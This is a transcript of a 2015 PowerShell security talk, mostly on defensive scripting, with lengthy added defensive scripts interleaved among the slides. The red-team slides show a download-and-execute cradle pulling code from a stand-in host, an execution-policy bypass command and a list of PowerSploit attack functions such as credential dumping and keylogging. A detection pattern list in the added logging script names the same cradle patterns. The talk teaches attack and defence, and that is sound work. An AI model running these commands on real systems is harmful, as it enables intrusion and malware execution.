Who Should Use Powershell? You Should Use Powershell!

Aug 15, 2015

Ben Finke
Transcript
Page 1: Who Should Use Powershell?  You Should Use Powershell!

Who should use Powershell?

You should use Powershell!

Ben Finke

@benfinke

Page 2:

A bit about me…

Ben Finke

@benfinke (if you’re into that sort of thing)

Page 3:

▪ Security team at EI

Page 4:

▪ Love continuous learning

Page 5:

Red Teamer Blue Teamer

Page 6:

What brought me to Powershell

Page 7:

Standing on the Shoulders…

▪ Carlos Perez

▪ Matt Graeber

▪ Chris Campbell

▪ Matt Johnson

▪ Don Jones

▪ Lee Holmes

▪ Wolfgang Goerlich

▪ Rich Cassara

▪ Nick Jacob

▪ Ben Ten

▪ Ed Wilson

▪ Adam Driscoll

▪ And many, many more…

Page 8:

I’m NOT saying…

Only use Powershell!!

Page 9:

I’m NOT saying…

My way or the highway

Page 10:

I AM saying…

Use Windows?

Powershell is great.

Page 11:

I AM saying…

New to scripting?

Powershell is great.

Page 12:

I AM saying…

Pick the right tool for the right job.

Page 13:

Powershell – The Beginning

▪ Built into Windows!

▪ Better than Batch and cmd.exe

▪ Objects > Manipulating text output

▪ Powershell Remoting

▪ Did I mention it’s built into Windows?!

▪ Great documentation, code samples, communities

▪ Best tool for scripting and automating Windows

Page 14:

Levelset

▪ Cmdlet (pronounced like it sounds)

▪ Functions

▪ Scripts

▪ Modules

▪ Object

▪ Method vs Property

▪ Variable

Page 15:

Cmdlet

▪ Not misspelled – a feature!

▪ Powershell commands – implement specific functionality

▪ Verb-Noun pattern

▪ Microsoft and Third-Party cmdlets available

▪ Written in .NET (like C#)

▪ Get-Command

▪ Get-Help
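To make the Verb-Noun, Get-Command and Get-Help points concrete, here is an added example (not a script from the talk): an advanced function that behaves like a cmdlet, binds parameters, carries comment-based help, and returns objects rather than text. Get-NetTCPConnection and Get-Process are real cmdlets (Windows 8 / Server 2012 and newer); the function name Get-ListeningPort is my own.

```powershell
# Added example (not from the slides): an advanced function that follows the
# Verb-Noun convention, binds parameters like a compiled cmdlet, and carries
# comment-based help so Get-Help and Get-Command treat it like any other cmdlet.
# Get-NetTCPConnection is a real cmdlet (Windows 8 / Server 2012 and newer).

function Get-ListeningPort {
    <#
    .SYNOPSIS
        Lists TCP ports in the LISTEN state together with the owning process.
    .DESCRIPTION
        Wraps Get-NetTCPConnection and Get-Process so the caller gets objects,
        not text, and can pipe the result to Sort-Object, Where-Object or Export-Csv.
    .PARAMETER Port
        Optional list of ports to restrict the output to.
    .EXAMPLE
        Get-ListeningPort | Sort-Object LocalPort
    .EXAMPLE
        Get-ListeningPort -Port 445,3389 | Format-Table
    #>
    [CmdletBinding()]
    param(
        [Parameter(ValueFromPipeline = $true)]
        [ValidateRange(1, 65535)]
        [int[]]$Port
    )

    process {
        $listeners = Get-NetTCPConnection -State Listen -ErrorAction Stop
        if ($Port) {
            $listeners = $listeners | Where-Object { $Port -contains $_.LocalPort }
        }
        foreach ($conn in $listeners) {
            $proc = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
            # Emit a custom object: properties, not formatted text, so the
            # pipeline can keep working with it.
            [PSCustomObject]@{
                LocalAddress = $conn.LocalAddress
                LocalPort    = $conn.LocalPort
                ProcessId    = $conn.OwningProcess
                ProcessName  = if ($proc) { $proc.ProcessName } else { $null }
                Path         = if ($proc) { $proc.Path } else { $null }
            }
        }
    }
}

# Once the function is loaded (dot-source the file or put it in a module),
# the usual discovery cmdlets find it like any built-in cmdlet:
Get-Command -Verb Get -Noun ListeningPort
Get-Help Get-ListeningPort -Examples

# Objects beat text: filter on a property instead of parsing netstat output.
Get-ListeningPort | Where-Object { $_.LocalAddress -eq '0.0.0.0' } | Format-Table -AutoSize
```

The comment-based help block is what makes Get-Help work on your own code, and the [CmdletBinding()] attribute is what gives the function -Verbose, -ErrorAction and the rest of the common parameters for free.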

Page 17:

So, where do I write my awesome code?

▪ Powershell ISE

▪ Notepad++

▪ Sublime Text Editor 2

▪ Primal Script ($)

▪ Visual Studio ($ or Community)

▪ You’re totally going to need a Windows computer though…

Page 18:

Powershell ISE

▪ Integrated Scripting Environment

▪ Tab Expansion

▪ Module Search

▪ Context based Help

▪ Demo!

Page 19:

Blue Team – Builder and Defender

Discovery

Baseline

System Hardening

Incident Response

Page 20:

Show Command Logging
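The slide was a live demo; as an added example (not the speaker's demo script) this turns on the three kinds of PowerShell logging the engine offers and then queries the result for the patterns a defender looks at first. Script block logging (event 4104) needs WMF 5 / Windows 10 or newer; module logging and transcription also exist on WMF 4. The registry paths are the ones the Group Policy templates write; the transcript directory and the pattern list are assumptions to adapt.

```powershell
# Added example (not from the slides): turn on PowerShell logging and query
# the events it produces. Registry paths match the PowerShell ADMX templates.

function Enable-PowerShellLogging {
    [CmdletBinding()]
    param(
        [string]$TranscriptDirectory = 'C:\PSTranscripts'   # assumed location
    )
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    # Script block logging: records the de-obfuscated code the engine actually
    # compiles, as event 4104 in Microsoft-Windows-PowerShell/Operational.
    New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
    Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord

    # Module logging: pipeline execution details (event 4103) for every module.
    New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
    Set-ItemProperty -Path "$base\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
    New-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null

    # Transcription: a text transcript of every session, written to a directory
    # that should be forwarded to central logging and not writable by users.
    New-Item -Path "$base\Transcription" -Force | Out-Null
    Set-ItemProperty -Path "$base\Transcription" -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\Transcription" -Name OutputDirectory -Value $TranscriptDirectory
}

function Find-SuspiciousScriptBlock {
    <#
    .SYNOPSIS
        Pulls script block events and flags the patterns a defender checks first:
        download cradles, encoded commands and execution-policy overrides.
    #>
    [CmdletBinding()]
    param(
        [int]$Hours = 24,
        # Assumed starting list; extend it with what your own environment sees.
        [string[]]$Pattern = @('DownloadString', 'DownloadFile', 'Invoke-Expression',
                               '\bIEX\b', '-EncodedCommand', '-enc\b', 'ExecutionPolicy Bypass')
    )
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    $regex = ($Pattern -join '|')
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Property 2 of a 4104 event is the script block text itself.
        $text = $_.Properties[2].Value
        if ($text -match $regex) {
            [PSCustomObject]@{
                TimeCreated = $_.TimeCreated
                Computer    = $_.MachineName
                UserId      = $_.UserId
                Matched     = $Matches[0]
                ScriptBlock = $text
            }
        }
    }
}

# Usage (elevated): enable logging, then review what ran in the last day.
# Enable-PowerShellLogging
# Find-SuspiciousScriptBlock -Hours 24 | Format-List
```

Forward the Operational log and the transcript directory to your central logging (a later slide's point) or the evidence lives on the very box an attacker controls.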

Page 21:

Powershell Remoting

▪ Run that powershell script on a remote Windows system!

▪ Uses WinRM

Page 22:

Powershell Remoting – A word of caution

▪ Windows 2012 and newer – default w/ HTTP listener

▪ All others need to be configured (once WMF is installed)

▪ Kerberos in AD, Basic and NTLM for workgroups

▪ Use HTTPS when available! (need a Windows CA)

▪ CredSSP is an option (especially if you like PtH Attacks) – That was a joke, you don’t.

▪ CredSSP for delegation and multi-hops
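As an added example (not configuration from the talk), the settings the slide warns about expressed as a check-then-fix script over the WSMan: drive: read the current posture, turn off clear-text transport, Basic auth and CredSSP on the server side, and add an HTTPS listener bound to a certificate from your internal CA. The certificate thumbprint and server name are placeholders; run it elevated on the host being configured.

```powershell
# Added example (not from the slides): check and tighten the WinRM settings the
# slide warns about. Run elevated on the target host. The certificate thumbprint
# is a placeholder; use a server-auth certificate issued by your internal CA.

function Get-WinRMSecurityPosture {
    # Read the WSMan provider so you can see what is on before changing it.
    $transports = Get-ChildItem WSMan:\localhost\Listener | ForEach-Object {
        (Get-ChildItem $_.PSPath | Where-Object Name -eq 'Transport').Value
    }
    [PSCustomObject]@{
        BasicAuth        = (Get-Item WSMan:\localhost\Service\Auth\Basic).Value
        KerberosAuth     = (Get-Item WSMan:\localhost\Service\Auth\Kerberos).Value
        NegotiateAuth    = (Get-Item WSMan:\localhost\Service\Auth\Negotiate).Value
        CredSSPAuth      = (Get-Item WSMan:\localhost\Service\Auth\CredSSP).Value
        AllowUnencrypted = (Get-Item WSMan:\localhost\Service\AllowUnencrypted).Value
        Listeners        = ($transports -join ',')
    }
}

function Set-WinRMHardened {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [Parameter(Mandatory = $true)]
        [string]$CertificateThumbprint     # placeholder: thumbprint of the host's server-auth cert
    )

    # Weak settings the slide calls out: clear-text transport, Basic auth, CredSSP.
    Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $false
    Set-Item WSMan:\localhost\Service\Auth\Basic -Value $false
    Disable-WSManCredSSP -Role Server -ErrorAction SilentlyContinue

    # Kerberos stays on for domain members; Negotiate falls back to NTLM only
    # for workgroup hosts, which is the case the slide mentions.
    Set-Item WSMan:\localhost\Service\Auth\Kerberos -Value $true

    # Add an HTTPS listener bound to the CA-issued certificate (TCP 5986).
    $existing = Get-ChildItem WSMan:\localhost\Listener |
        Where-Object { (Get-ChildItem $_.PSPath | Where-Object Name -eq 'Transport').Value -eq 'HTTPS' }
    if (-not $existing -and $PSCmdlet.ShouldProcess('WSMan listener', 'Create HTTPS listener')) {
        New-Item -Path WSMan:\localhost\Listener -Transport HTTPS -Address * `
            -CertificateThumbprint $CertificateThumbprint -Force | Out-Null
        New-NetFirewallRule -DisplayName 'WinRM HTTPS' -Direction Inbound -Protocol TCP `
            -LocalPort 5986 -Action Allow | Out-Null
    }
}

# Before / after:
# Get-WinRMSecurityPosture
# Set-WinRMHardened -CertificateThumbprint 'PLACEHOLDER_THUMBPRINT' -WhatIf

# Client side: insist on SSL and Kerberos, so credentials never travel over
# NTLM in the clear and the server must present the CA-issued certificate.
# Invoke-Command -ComputerName server01.corp.example -UseSSL -Authentication Kerberos `
#     -ScriptBlock { Get-Service WinRM }
```

The -UseSSL switch on the client is the other half of "use HTTPS when available": the listener alone does nothing if administrators keep connecting to port 5985.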

Page 23:

Discovery

Discovery

Baseline

System Hardening

Incident Response

Page 24:

Powershell Discovery

▪ Incorporate useful information from other tools

– Nmap

– Nessus

▪ Pull info from AD directly

– Windows 2008 R2 – 76 cmdlets in AD PS Module

– Windows 2012 – 135 cmdlets

– Windows 2012 R2 – 147 cmdlets

▪ Roll your own scanner with Powershell!
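An added example (not a script from the talk) of pulling inventory from AD directly and adding one piece of home-grown discovery: for every computer object in an OU, is WinRM actually reachable, and has the account gone stale? The ActiveDirectory module ships with RSAT / Windows 2008 R2 and newer; the domain, OU, port and output path are assumptions.

```powershell
# Added example (not from the slides): build a host inventory straight from AD
# with the ActiveDirectory module, then check which machines actually answer
# on the WinRM port so you know where remoting will work. The OU and the
# stale-account threshold are assumptions.

Import-Module ActiveDirectory

function Test-TcpPortQuick {
    param(
        [Parameter(Mandatory = $true)][string]$ComputerName,
        [int]$Port = 5985,          # WinRM over HTTP; use 5986 if you run HTTPS listeners
        [int]$TimeoutMs = 500
    )
    # Test-NetConnection is slow when hosts are down; a raw TcpClient with a
    # short timeout keeps a large inventory sweep manageable.
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $async = $client.BeginConnect($ComputerName, $Port, $null, $null)
        if ($async.AsyncWaitHandle.WaitOne($TimeoutMs, $false) -and $client.Connected) {
            $client.EndConnect($async)
            return $true
        }
        return $false
    } catch {
        return $false
    } finally {
        $client.Close()
    }
}

function Get-DomainHostInventory {
    [CmdletBinding()]
    param(
        [string]$SearchBase = 'OU=Servers,DC=corp,DC=example',   # assumed OU
        [int]$StaleDays = 90
    )
    $cutoff = (Get-Date).AddDays(-$StaleDays)

    Get-ADComputer -Filter * -SearchBase $SearchBase `
        -Properties OperatingSystem, LastLogonDate, IPv4Address |
        ForEach-Object {
            $reachable = if ($_.Enabled -and $_.DNSHostName) {
                Test-TcpPortQuick -ComputerName $_.DNSHostName
            } else { $false }

            [PSCustomObject]@{
                Name            = $_.Name
                DNSHostName     = $_.DNSHostName
                IPv4Address     = $_.IPv4Address
                OperatingSystem = $_.OperatingSystem
                Enabled         = $_.Enabled
                LastLogonDate   = $_.LastLogonDate
                # Accounts that never logged on, or not recently, are findings
                # in their own right: orphaned objects are easy to hide behind.
                Stale           = (-not $_.LastLogonDate) -or ($_.LastLogonDate -lt $cutoff)
                WinRMReachable  = $reachable
            }
        }
}

# Usage: keep the objects, but also land them in CSV for the next step (baselining).
# Get-DomainHostInventory | Export-Csv -NoTypeInformation .\inventory.csv
# Get-DomainHostInventory | Where-Object { $_.Enabled -and -not $_.WinRMReachable }
```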

Page 25:

Baseline your stuff…

Discovery

Baseline

System Hardening

Incident Response

Page 26:

Baseline – Discovery, done repeatedly

▪ A lot of your discovery tasks will end up in your baseline

▪ Script up what you want to know

▪ Put it into some kind of usable text format

▪ Stash it in a versioning repository

▪ What changed between yesterday and today?
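The five bullets above are one procedure, so here is an added example (not the speaker's script) that carries it through end to end: snapshot the things that change when a box is tampered with, write them as JSON, commit to a git repository, and report what differs from the previous run. The repository path is an assumption, git must be on PATH, and Get-NetTCPConnection / Get-ScheduledTask need Windows 8 / Server 2012 or newer.

```powershell
# Added example (not from the slides): "discovery, done repeatedly". Each run
# snapshots local admins, services, listening ports, scheduled tasks and Run
# keys, commits the JSON to git, and diffs against the previous snapshot.

function Get-SystemBaseline {
    # Everything is sorted so two snapshots differ only when the system did.
    $adminGroup = [ADSI]'WinNT://./Administrators,group'
    $runKey     = Get-Item 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'

    [PSCustomObject]@{
        Hostname       = $env:COMPUTERNAME
        LocalAdmins    = @($adminGroup.psbase.Invoke('Members') | ForEach-Object {
                             $_.GetType().InvokeMember('Name', 'GetProperty', $null, $_, $null)
                         } | Sort-Object)
        Services       = @(Get-CimInstance Win32_Service |
                           Select-Object Name, StartMode, State, PathName, StartName | Sort-Object Name)
        ListeningPorts = @(Get-NetTCPConnection -State Listen |
                           Select-Object LocalAddress, LocalPort, OwningProcess | Sort-Object LocalPort)
        ScheduledTasks = @(Get-ScheduledTask | Where-Object State -ne 'Disabled' |
                           Select-Object TaskName, TaskPath,
                               @{ n = 'Action'; e = { $_.Actions.Execute -join ' ' } } |
                           Sort-Object TaskPath, TaskName)
        RunKeys        = @($runKey.GetValueNames() | Sort-Object | ForEach-Object {
                             [PSCustomObject]@{ Name = $_; Value = $runKey.GetValue($_) }
                         })
    }
}

function Compare-Baseline {
    param(
        [Parameter(Mandatory = $true)][string]$OldPath,
        [Parameter(Mandatory = $true)][string]$NewPath
    )
    $old = Get-Content -Raw $OldPath | ConvertFrom-Json
    $new = Get-Content -Raw $NewPath | ConvertFrom-Json
    foreach ($section in 'LocalAdmins', 'Services', 'ListeningPorts', 'ScheduledTasks', 'RunKeys') {
        # Compare on a compact JSON form so nested objects compare by value,
        # and wrap in @() because a one-item section comes back as a scalar.
        $a = @($old.$section | ForEach-Object { $_ | ConvertTo-Json -Compress })
        $b = @($new.$section | ForEach-Object { $_ | ConvertTo-Json -Compress })
        foreach ($item in ($b | Where-Object { $a -notcontains $_ })) {
            [PSCustomObject]@{ Section = $section; Change = 'Added';   Item = $item }
        }
        foreach ($item in ($a | Where-Object { $b -notcontains $_ })) {
            [PSCustomObject]@{ Section = $section; Change = 'Removed'; Item = $item }
        }
    }
}

function Save-Baseline {
    param([string]$RepoPath = 'C:\Baselines')   # assumed: a directory git can own
    if (-not (Test-Path (Join-Path $RepoPath '.git'))) {
        New-Item -ItemType Directory -Path $RepoPath -Force | Out-Null
        git -C $RepoPath init | Out-Null
    }
    $file     = Join-Path $RepoPath "$env:COMPUTERNAME.json"
    $previous = Join-Path $env:TEMP "$env:COMPUTERNAME.baseline.prev.json"
    $hadPrior = Test-Path $file
    if ($hadPrior) { Copy-Item $file $previous -Force }

    Get-SystemBaseline | ConvertTo-Json -Depth 5 | Set-Content -Encoding UTF8 $file
    git -C $RepoPath add $file | Out-Null
    git -C $RepoPath commit -q -m "baseline $env:COMPUTERNAME $(Get-Date -Format s)" | Out-Null

    # "What changed between yesterday and today?"
    if ($hadPrior) { Compare-Baseline -OldPath $previous -NewPath $file }
}

# Run daily from a scheduled task; anything it prints is a change to explain.
# Save-Baseline | Format-Table -AutoSize
```

The git history is the point: a new local admin or a new Run key shows up as a one-line diff with a timestamp, and git log tells you exactly which day it appeared.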

Page 27:

Automate Reporting

▪ Need to nicely present Nessus or nmap output?

▪ Previous work – Carlos Perez (DarkOperator) – Posh-NVS

▪ https://github.com/darkoperator/Posh-NVS

▪ Powershell easily handles XML and CSV inputs

# Load the .nessus file as XML; -Raw reads it as one string instead of an array of lines
[xml]$report = Get-Content -Raw .\scan.nessus

$reporthosts = $report.NessusClientData_v2.Report.ReportHost

# Flatten every host's findings into one list and browse them in a sortable grid
$reporthosts | ForEach-Object { $_.ReportItem } | Out-GridView
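The same [xml] approach carried a step further, as an added example (not from the talk or from Posh-NVS): group findings by severity and produce the per-plugin CSV a remediation owner wants. The scan data is a constructed two-host sample in the .nessus v2 layout, embedded so the example runs offline; for a real report replace it with Get-Content -Raw .\scan.nessus.

```powershell
# Added example (not from the slides). The XML below is a constructed sample
# in the NessusClientData_v2 layout; the plugin IDs and names are invented.

$sampleNessus = @'
<?xml version="1.0" ?>
<NessusClientData_v2>
  <Report name="constructed-sample">
    <ReportHost name="10.0.0.5">
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4" pluginID="100001" pluginName="Sample critical SMB finding (constructed)" />
      <ReportItem port="80" svc_name="www" protocol="tcp" severity="1" pluginID="100002" pluginName="Sample low HTTP finding (constructed)" />
    </ReportHost>
    <ReportHost name="10.0.0.9">
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4" pluginID="100001" pluginName="Sample critical SMB finding (constructed)" />
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0" pluginID="100003" pluginName="Sample informational item (constructed)" />
    </ReportHost>
  </Report>
</NessusClientData_v2>
'@

function ConvertFrom-NessusReport {
    param([Parameter(Mandatory = $true)][xml]$Report)
    # Nessus stores severity as 0-4; map it to the label people expect in a report.
    $severityName = @{ '0' = 'Info'; '1' = 'Low'; '2' = 'Medium'; '3' = 'High'; '4' = 'Critical' }
    # Note: $host is an automatic variable in PowerShell, so use another name.
    foreach ($reportHost in $Report.NessusClientData_v2.Report.ReportHost) {
        foreach ($item in $reportHost.ReportItem) {
            [PSCustomObject]@{
                Host       = $reportHost.name
                Port       = [int]$item.port
                Protocol   = $item.protocol
                Severity   = [int]$item.severity
                Rating     = $severityName[$item.severity]
                PluginID   = $item.pluginID
                PluginName = $item.pluginName
            }
        }
    }
}

$findings = ConvertFrom-NessusReport -Report ([xml]$sampleNessus)

# Roll-up by severity, ignoring informational noise.
$findings | Where-Object Severity -gt 0 | Group-Object Rating |
    Select-Object Name, Count | Sort-Object Count -Descending

# One row per plugin with the hosts affected: the view a remediation owner wants.
$findings | Where-Object Severity -ge 3 | Group-Object PluginID | ForEach-Object {
    [PSCustomObject]@{
        PluginID   = $_.Name
        PluginName = $_.Group[0].PluginName
        Rating     = $_.Group[0].Rating
        HostCount  = $_.Count
        Hosts      = ($_.Group.Host | Sort-Object -Unique) -join ', '
    }
} | Export-Csv -NoTypeInformation .\critical-findings.csv
```

Because ConvertFrom-NessusReport emits objects, the same $findings feeds Out-GridView, a CSV, or a comparison against last week's scan without re-parsing anything.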

Page 28:

Script out your ideal config…

Discovery

Baseline

System Hardening

Incident Response

Page 29:

System Hardening

▪ Use Powershell to:

– Enable Windows Firewall

– Enable Windows Update

– Disable Guest account

– Disable autoplay

– Install AV software

– Turn on User Account Control

– Disable Java in IE
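The hardening list as one idempotent script, added here as an example (not the speaker's own): each step reads the current value before touching it, so the same script doubles as a report-only audit, and every change is logged. Windows Firewall, Windows Update, the Guest account, AutoPlay and UAC are covered; installing AV and disabling the Java add-on in IE are vendor-specific and left out. The log path is an assumption, the session must be elevated, and the *-NetFirewallProfile cmdlets need Windows 8 / Server 2012 or newer.

```powershell
# Added example (not from the slides): the hardening bullets as a script that
# can audit (-ReportOnly) or fix, logging each deviation it finds.

$script:LogPath = 'C:\Hardening\hardening.log'   # assumed log location

function Write-HardeningLog {
    param([string]$Message)
    $line = '{0:s} {1} {2}' -f (Get-Date), $env:COMPUTERNAME, $Message
    Add-Content -Path $script:LogPath -Value $line
    Write-Verbose $line
}

function Set-RegistryDword {
    # Helper: set a DWORD value only if it differs, and say so.
    param([string]$Path, [string]$Name, [int]$Value, [switch]$ReportOnly)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    $current = (Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name
    if ($current -eq $Value) { return }
    Write-HardeningLog "$Path\$Name is '$current', expected $Value"
    if (-not $ReportOnly) {
        Set-ItemProperty -Path $Path -Name $Name -Value $Value -Type DWord
        Write-HardeningLog "set $Path\$Name = $Value"
    }
}

function Invoke-BasicHardening {
    [CmdletBinding()]
    param([switch]$ReportOnly)

    New-Item -ItemType Directory -Path (Split-Path $script:LogPath) -Force | Out-Null

    # 1. Windows Firewall on for every profile.
    foreach ($p in Get-NetFirewallProfile) {
        if ($p.Enabled -ne 'True') {
            Write-HardeningLog "firewall profile $($p.Name) is disabled"
            if (-not $ReportOnly) { Set-NetFirewallProfile -Name $p.Name -Enabled True }
        }
    }

    # 2. Windows Update: automatic download and install (AUOptions 4), not disabled.
    $au = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU'
    Set-RegistryDword -Path $au -Name NoAutoUpdate -Value 0 -ReportOnly:$ReportOnly
    Set-RegistryDword -Path $au -Name AUOptions    -Value 4 -ReportOnly:$ReportOnly

    # 3. Guest account disabled (ADSI works on older hosts; Disable-LocalUser needs PS 5.1).
    $guest = [ADSI]'WinNT://./Guest,user'
    if (-not $guest.InvokeGet('AccountDisabled')) {
        Write-HardeningLog 'Guest account is enabled'
        if (-not $ReportOnly) {
            $guest.InvokeSet('AccountDisabled', $true)
            $guest.SetInfo()
        }
    }

    # 4. AutoPlay off for all drive types (0xFF).
    Set-RegistryDword -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer' `
        -Name NoDriveTypeAutoRun -Value 255 -ReportOnly:$ReportOnly

    # 5. User Account Control on, prompting on the secure desktop.
    $uac = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    Set-RegistryDword -Path $uac -Name EnableLUA             -Value 1 -ReportOnly:$ReportOnly
    Set-RegistryDword -Path $uac -Name PromptOnSecureDesktop -Value 1 -ReportOnly:$ReportOnly
}

# Invoke-BasicHardening -ReportOnly -Verbose   # see what would change
# Invoke-BasicHardening -Verbose               # apply it
```

Running the report-only mode on a schedule turns the hardening script into a drift detector; the log lines are the "what changed" signal from the baseline slide, produced from the other direction.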

Page 30:

What to do when weird things happen…

Discovery

Baseline

System Hardening

Incident Response

Page 31:

Incident Response

▪ Something bad (or maybe bad) is happening

▪ Identify source of unwanted activity

▪ Determine what is occurring

▪ Isolate and Contain

▪ Gather information from isolated system(s)

▪ After Action review

Page 33:

Build Your Own HoneyPot!

▪ Create cmdlet parameter binding

▪ Make sure you’re admin

▪ Build your whitelist

▪ Create a listening port

▪ Any connection – add source IP to firewall

▪ Log the action (for reporting and response)
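The six steps above are one build, so here is an added example (not the speaker's own honeypot script) that carries them through in order: cmdlet-style parameter binding, an admin check, a whitelist, a TCP listener on a port nothing legitimate should touch, a block rule for any other source, and a log line for every decision. New-NetFirewallRule needs Windows 8 / Server 2012 or newer; the decoy port, the whitelist addresses and the log path are assumptions.

```powershell
# Added example (not from the slides): the honeypot steps as one script.
# Save as Start-HoneyPot.ps1 and run from an elevated session.

[CmdletBinding()]
param(
    [ValidateRange(1, 65535)]
    [int]$Port = 2222,                                    # assumed decoy port

    [string[]]$Whitelist = @('127.0.0.1', '10.0.0.10'),   # assumed: scanners and admin hosts

    [string]$LogPath = 'C:\HoneyPot\honeypot.log',        # assumed log location

    [int]$MaxConnections = 0                              # 0 = run until Ctrl+C
)

# Make sure you're admin: firewall rules cannot be created otherwise.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    throw 'Run this from an elevated PowerShell session.'
}

New-Item -ItemType Directory -Path (Split-Path $LogPath) -Force | Out-Null

function Write-HoneyLog {
    param([string]$Message)
    $line = '{0:s} {1}' -f (Get-Date), $Message
    Add-Content -Path $LogPath -Value $line
    Write-Verbose $line
}

function Block-SourceAddress {
    param([string]$Address)
    $ruleName = "HoneyPot block $Address"
    # Idempotent: a repeat offender already has a rule.
    if (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue) { return $false }
    New-NetFirewallRule -DisplayName $ruleName -Direction Inbound -Action Block `
        -RemoteAddress $Address -Profile Any -Enabled True | Out-Null
    return $true
}

# Create the listening port.
$listener = New-Object System.Net.Sockets.TcpListener([System.Net.IPAddress]::Any, $Port)
$listener.Start()
Write-HoneyLog "listening on tcp/$Port, whitelist: $($Whitelist -join ',')"

$seen = 0
try {
    while ($MaxConnections -eq 0 -or $seen -lt $MaxConnections) {
        $client = $listener.AcceptTcpClient()       # blocks until something connects
        $seen++
        $remote = ([System.Net.IPEndPoint]$client.Client.RemoteEndPoint).Address.IPAddressToString
        $client.Close()                               # nothing to say; just note who knocked

        if ($Whitelist -contains $remote) {
            Write-HoneyLog "ALLOW $remote (whitelisted)"
            continue
        }
        if (Block-SourceAddress -Address $remote) {
            Write-HoneyLog "BLOCK $remote added to firewall"
        } else {
            Write-HoneyLog "BLOCK $remote already blocked, connection attempt noted"
        }
    }
} finally {
    $listener.Stop()
    Write-HoneyLog 'listener stopped'
}
```

Put your own vulnerability scanners and management hosts in the whitelist before you start it, or the first scheduled scan will lock them out; the log file is what you forward to central logging so a hit on the decoy becomes an alert rather than a surprise.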

Page 34:

PoshSec

▪ A Powershell module designed for executing security tasks on Windows systems

▪ Started by Will Steele and Matt Johnson

▪ Github – PoshSec

▪ Blue Team Focused

▪ Provides the platform for scripting and automating your playbook

Page 35:

PoshSec Framework

▪ A framework for Powershell and PoshSec scripts for network management, security, and maintenance

▪ Graphical Framework

Page 36:

PoshSec

▪ Critical Security Controls

– (1) Inventory of Authorized and Unauthorized Devices

– (2) Inventory of Authorized and Unauthorized Software

– (11) Limitation and Control of Network Ports, Protocols, and Services

– (12) Controlled Use of Admin Privileges

– (16) Account Monitoring and Control

▪ Baselines

▪ Forensics

▪ Log Management

▪ Software Management

Page 37:

A few helpful hints

▪ Get a code repo – SVN/Git/TFS/whatever

▪ Centralized logging

▪ Prepare BEFORE the Incident

▪ Test your defenses

▪ Test your response

Page 38:

Red Team – Destroyer of Dreams

Page 39:

Attacker’s Advantage

“Attack him where he is unprepared, appear where you are not expected.”

-Sun Tzu

*Obligatory Art of War quote

Page 40:

So you’re on this pentest…

▪ You totally exploit that one thing.

▪ And then AV stops every. Single. Thing. You. Try.

▪ Time to Live off the Land!**

** Living off the Land – By Chris Campbell and Matt Graeber

Page 41:

Powershell as a Post Exploitation Tool

▪ Remember what we said about already on the system?

▪ Bypass AV and application whitelisting

▪ Control all aspects of a Windows system

▪ Easy to execute:

Invoke-Expression (New-Object Net.WebClient).DownloadString("http://evilsite.com/code.txt")

Page 42:

PowerSploit

▪ Github project - https://github.com/mattifestation/PowerSploit

▪ Started by Matt Graeber (@mattifestation)

▪ Powershell modules for pentesters

▪ Loads of PS goodness like:

• Invoke-Shellcode

• Find-AVSignature

• Invoke-TokenManipulation

• Invoke-Mimikatz

• Get-Keystrokes

• Get-TimedScreenshot

• Set-MasterBootRecord

• Set-CriticalProcess (BSoD)

• Invoke-Portscan

• Invoke-ReverseDnsLookup

• Get-PEHeader

• Get-DLLLoadPath

• And lots, lots more!

Page 43:

“But wait!” you say…

Won’t the Execution Policy prevent our PS from running?

Page 44:

Not so much…

Powershell.exe -ExecutionPolicy Bypass evilscript.ps1

Page 45:

Seriously Bro, Powershell on a pentest?

▪ Yes, I am quite serious (and don’t call me Bro…)

▪ Ever hear of Deep Panda?

– ProTip: Do NOT search for “Deep Panda” on Google Images.

▪ Deep Panda – the APT, not the 80s Metal Band

▪ Maintained persistence with Powershell scripts as scheduled tasks

▪ Moral of the story: Good enough for Deep Panda, good enough for you!

Page 46:

Whatever you are writing, please remember…

▪ Your code will be written once – and read dozens of times.

▪ “accountName” is a way better variable than “a”

▪ Comments – use them!

▪ Think modular (or reusable)

▪ Error Catching

▪ Logging

▪ Documentation of your functions

▪ Code Repository

Page 47:

That’s it for me, you’ve been great!

If you enjoyed the talk, my name is Ben Finke.

If not, I’m Jess Hires (@hacksonville).

Thank you!